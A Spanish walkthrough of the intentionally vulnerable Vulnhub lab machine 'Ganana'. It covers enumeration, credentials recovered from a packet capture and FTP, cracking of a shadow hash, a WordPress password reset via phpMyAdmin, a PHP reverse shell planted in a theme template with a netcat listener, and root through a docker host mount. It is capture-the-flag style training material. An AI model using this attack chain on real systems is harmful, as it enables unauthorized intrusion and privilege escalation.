[VLN] Ganana

Hoy vamos a hackear la maquina de Vulnhub llamada Ganana. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/ganana-1,497/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    sml@Cassandra:~$ nmap -A -p- 192.168.1.142 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-26 16:42 CEST Nmap scan report for debian.home (192.168.1.142) Host is up (0.0014s latency). Not shown: 65531 filtered ports PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd (PHP 7.3.17) |_http-generator: WordPress 5.4.2 | http-robots.txt: 1 disallowed entry |_/wp-admin/ |_http-server-header: Apache |_http-title: Ganana 443/tcp open ssl/http Apache httpd (PHP 7.3.17) |_http-generator: WordPress 5.4.2 | http-robots.txt: 1 disallowed entry |_/wp-admin/ |_http-server-header: Apache |_http-title: Ganana | ssl-cert: Subject: commonName=www.example.com/organizationName=Bitnami | Not valid before: 2020-06-06T10:55:45 |_Not valid after: 2030-06-04T10:55:45 6777/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: TIMEOUT | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.1.148 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status Service Info: OS: Unix Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 167.04 seconds
    Exploramos un poco mas el puerto 80.
    sml@Cassandra:~$ gobuster dir -u http://192.168.1.142 -w /usr/share/wordlists/dirb/big.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.142 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/06/26 16:57:41 Starting gobuster =============================================================== /.htaccess (Status: 403) /.htpasswd (Status: 403) /! (Status: 301) /0 (Status: 301) /0000 (Status: 301) /asdfjkl; (Status: 301) /atom (Status: 301) /dashboard (Status: 302) /embed (Status: 301) /favicon.ico (Status: 302) /feed (Status: 301) /fixed! (Status: 301) /license (Status: 200) /logout (Status: 403) /lostpassword (Status: 200) /page1 (Status: 301) /phpmyadmin (Status: 301) /rdf (Status: 301) /readme (Status: 200) /register (Status: 302) /robots.txt (Status: 200) /rss (Status: 301) /rss2 (Status: 301) /secret (Status: 302) /tasks (Status: 200) /wp-admin (Status: 301) /wp-content (Status: 301) /wp-config (Status: 200) /wp-includes (Status: 301) =============================================================== 2020/06/26 17:13:02 Finished ===============================================================
    Vemos varios directorios interesantes. /secret nos lleva a un wordpress. /phpmyadmin es un phpmyadmin :) /tasks Al visitar /tasks en http://192.168.1.142/tasks nos encontramos el siguiente texto:
    Hey Jarret Lee! Do manage the office as the admin is away for a few weeks! Admin has created an other temp account for you and details in a pcapng file.
    Tras probar, finalmente encontramos el fichero .pcapng que menciona. Se encuentra en: http://192.168.1.142/jarret.pcapng Una vez descargado, lo vemos con Wireshark. Si miramos los paquetes HTTP que contienen POST /login... acabamos encontrando uno donde aparecen las credenciales correctas.
    jarretlee/NoBrUtEfOrCe__R3Qu1R3d__
    Una vez obtenidas las credenciales, nos logueamos al FTP usandolas.
    sml@Cassandra:~$ ftp 192.168.1.142 6777 Connected to 192.168.1.142. 220 (vsFTPd 3.0.3) Name (192.168.1.142:sml): jarretlee 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 3 1000 1000 4096 Jun 25 06:25 . drwxr-xr-x 3 600 0 4096 Jun 17 07:00 .. -rw------- 1 1000 1000 177 Jun 17 07:47 .backups -rw------- 1 1000 1000 515 Jun 25 06:25 .bash_history -rw-r--r-- 1 1000 1000 220 Jun 17 07:00 .bash_logout -rw-r--r-- 1 1000 1000 3526 Jun 17 07:00 .bashrc drwx------ 3 1000 1000 4096 Jun 25 06:25 .gnupg -rw-r--r-- 1 1000 1000 807 Jun 17 07:00 .profile 226 Directory send OK. ftp> get .backups local: .backups remote: .backups 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for .backups (177 bytes). 226 Transfer complete. 177 bytes received in 0.00 secs (1.5071 MB/s)
    Vemos que hay un fichero llamado .backups, lo descargamos para ver de que se trata.
    sml@Cassandra:~/yeah$ cat .backups amVldmFuOiQ2JExYTmFrYUJSSi90TDVGMmEkYkNnaXlsay9MWTJNZUZwNXo5WVp5aWV6c05zZ2ouNS9j RG9oUmdGUkJOZHJ3aS8ySVBrVU8wcnFWSU0zTzh2eXNjNDhnM1pwby9zSHVvLnF3QmY0VTE6MTg0MzA6 MDo5OTk5OTo3Ojo6
    Vemos que se trata de Base64, asi que hacemos el decode.
    sml@Cassandra:~/yeah$ echo "amVldmFuOiQ2JExYTmFrYUJSSi90TDVGMmEkYkNnaXlsay9MWTJNZUZwNXo5WVp5aWV6c05zZ2ouNS9 jRG9oUmdGUkJOZHJ3aS8ySVBrVU8wcnFWSU0zTzh2eXNjNDhnM1pwby9zSHVvLnF3QmY0VTE6MTg0MzA 6MDo5OTk5OTo3Ojo6" | base64 -d jeevan:$6$LXNakaBRJ/tL5F2a$bCgiylk/LY2MeFp5z9YZyiezsNsgj.5/cDohRgFRBNdrwi/2IPkUO 0rqVIM3O8vysc48g3Zpo/sHuo.qwBf4U1:18430:0:99999:7:::
    Parece que es la password cifrada de jeevan, con el formato que suele estar en el fichero /etc/shadow. Copiamos el usuario y la "password" a un fichero y usamos john para crackear la password.
    El fichero contenia un texto sml@Cassandra:~$ echo "jeevan:$6$LXNakaBRJ/tL5F2a$bCgiylk/LY2MeFp5z9YZyiezsNsgj.5/cDohRgFRBNdrwi/2IPkU O0rqVIM3O8vysc48g3Zpo/sHuo.qwBf4U1" > paz.txt sml@Cassandra:~$ /usr/sbin/john paz.txt --wordlist=rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status hannahmontana (jeevan) 1g 0:00:00:00 DONE (2020-06-26 23:40) 1.492g/s 3820p/s 3820c/s 3820C/s slimshady..hassan Use the "--show" option to display all of the cracked passwords reliably Session completed
    Vemos que la password del usuario jeevan es hannahmontana. Continuamos en el ftp. Esta vez vamos al directorio /opt/bitnami/apps/wordpress/htdocs y nos descargamos el fichero wp-config.php.
    ftp> pwd 257 "/opt/bitnami/apps/wordpress/htdocs" is the current directory ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-rw-r-- 1 1000 1 405 Feb 06 06:33 index.php -rw-r--r-- 1 1000 1000 189728 Jun 07 08:45 jarret.pcapng -rw-rw-r-- 1 1000 1 19915 Feb 12 11:54 license.txt -rw-rw-r-- 1 1000 1 7278 Jun 16 16:11 readme.html -rw-r--r-- 1 0 0 156 Jun 17 08:15 tasks.txt -rw-rw-r-- 1 1000 1 6912 Feb 06 06:33 wp-activate.php drwxrwxr-x 9 1000 1 4096 Jun 03 11:23 wp-admin -rw-rw-r-- 1 1000 1 351 Feb 06 06:33 wp-blog-header.php -rw-rw-r-- 1 1000 1 2332 Jun 16 16:11 wp-comments-post.php -rw-r----- 1 1000 1 4268 Jun 06 10:55 wp-config.php drwxrwxr-x 9 1000 1 4096 Jun 06 15:08 wp-content -rw-rw-r-- 1 1000 1 3940 Feb 06 06:33 wp-cron.php drwxrwxr-x 21 1000 1 12288 Jun 03 11:23 wp-includes -rw-rw-r-- 1 1000 1 2496 Feb 06 06:33 wp-links-opml.php -rw-rw-r-- 1 1000 1 3300 Feb 06 06:33 wp-load.php -rw-rw-r-- 1 1000 1 47874 Feb 10 03:50 wp-login.php -rw-rw-r-- 1 1000 1 8509 Apr 14 11:34 wp-mail.php -rw-rw-r-- 1 1000 1 19396 Apr 10 03:59 wp-settings.php -rw-rw-r-- 1 1000 1 31111 Feb 06 06:33 wp-signup.php -rw-rw-r-- 1 1000 1 4755 Feb 06 06:33 wp-trackback.php -rw-rw-r-- 1 1000 1 3133 Feb 06 06:33 xmlrpc.php 226 Directory send OK. ftp> get wp-config.php local: wp-config.php remote: wp-config.php 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for wp-config.php (4268 bytes). 226 Transfer complete. 4268 bytes received in 0.00 secs (5.0815 MB/s)
    Vemos a ver si tiene lo que buscamos :)
    sml@Cassandra:~/yeah$ cat wp-config.php ---SNIP--- /** MySQL database username */ define( 'DB_USER', 'bn_wordpress' ); /** MySQL database password */ define( 'DB_PASSWORD', 'aa75e9f9b1' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost:3306' ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); ---SNIP---
    Bien, tenemos unos credenciales! Los usamos para entrar en phpmyadmin http://192.168.1.142/phpmyadmin/ En la BBDD bitnami_wordpress vamos a la tabla wp_users y cambiamos la password del usuario charleywalker por la de jarretlee, ya que la conocemos. Una vez cambiada, entramos en wordpress con el usuario charleywalker y la password que hemos cambiado... es decir, la misma password que usa jarretlee. Preparamos una reverse shell.
    sml@Cassandra:~$ cp /usr/share/webshells/php/php-reverse-shell.php . sml@Cassandra:~$ mv php-reverse-shell.php rshell.php sml@Cassandra:~$ nano rshell.php #Editamos con nuestra IP/Puerto.
    En wordpress, logueados como charleywalker, vamos a Appearance --> Theme Editor -> 404 Template (404.php) Lo editamos, pegamos la reverse shell y guardamos. Ponemos nc a la escucha:
    sml@Cassandra:~$ nc -nlvp 1234 listening on [any] 1234 ...
    Y visitamos http://192.168.1.142/404.php
  • Low Shell
  • sml@Cassandra:~$ nc -nlvp 1234 listening on [any] 1234 ... connect to [192.168.1.148] from (UNKNOWN) [192.168.1.142] 57130 Linux debian 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux 19:57:55 up 2:04, 0 users, load average: 0.44, 0.16, 0.10 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=1(daemon) gid=1(daemon) groups=1(daemon) /bin/sh: 0: can't access tty; job control turned off $ id uid=1(daemon) gid=1(daemon) groups=1(daemon)
    Como en los pasos anteriores encontramos la password del usuario jeevan, usamos su para cambiar de usuario.
    $ python3 -c 'import pty; pty.spawn("/bin/bash")' daemon@debian:/home$ daemon@debian:/home/jarretlee$ su jeevan Password: hannahmontana jeevan@debian:/home/jarretlee$ id uid=1003(jeevan) gid=1005(jeevan) groups=1005(jeevan),115(docker)
    Vemos que jeevan esta en el grupo de docker, vamos a ver que imagenes hay.
    jeevan@debian:/tmp$ docker images docker images REPOSITORY TAG IMAGE ID CREATED SIZE bash latest 0980cb958276 3 weeks ago 13.1MB alpine latest a24bb4013296 3 weeks ago 5.57MB hello-world latest bf756fb1ae65 5 months ago 13.3kB
    Tenemos una imagen de bash que nos puede ser util :) Montamos la / del sistema en /mnt/mygod del container que vamos a ejecutar, en el cual al tener privilegios de root podremos ver toda la raiz del sistema host que hemos montado en /mnt/mygod...
  • root.txt
  • jeevan@debian:/tmp$ docker run -v /:/mnt/mygod -ti 0980cb958276 docker run -v /:/mnt/mygod -ti 0980cb958276 bash-5.0# cd /mnt/mygod/root bash-5.0# ls bitnami jeevan bitnami_credentials root.txt bash-5.0# cat root.txt _ _ _ _ __ __ __ ___ | | | | o O O __| | ___ _ _ ___ | | \ V V / / -_) | | | | o / _` | / _ \ | ' \ / -_) |_| \_/\_/ \___| _|_|_ _|_|_ TS__[O] \__,_| \___/ |_||_| \___| _(_)_ _|"""""|_|"""""|_|"""""|_|"""""| {======|_|"""""|_|"""""|_|"""""|_|"""""|_| """ | "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'./o--000'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0- '
  • End
  • Y con esto ya seriamos root de la maquina :)